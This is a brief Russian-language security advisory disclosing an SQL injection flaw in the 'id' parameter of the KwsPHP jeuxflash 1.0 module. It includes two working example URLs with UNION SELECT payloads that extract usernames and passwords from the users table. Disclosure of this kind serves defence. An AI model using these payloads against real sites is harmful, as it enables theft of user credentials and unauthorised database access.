Программа: KwsPHP Module jeuxflash 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id= -1%20union%20select%201,pseudo,3,4,5,6,7,8,9,10%20 from%20users%20where%20id=1—

http://server.com/Path/index.php?mod=jeuxflash&ac=play&id= -1%20union%20select%201,pass,3,4,5,6,7,8,9,10%20 from%20users%20where%20id=1—



Оставить мнение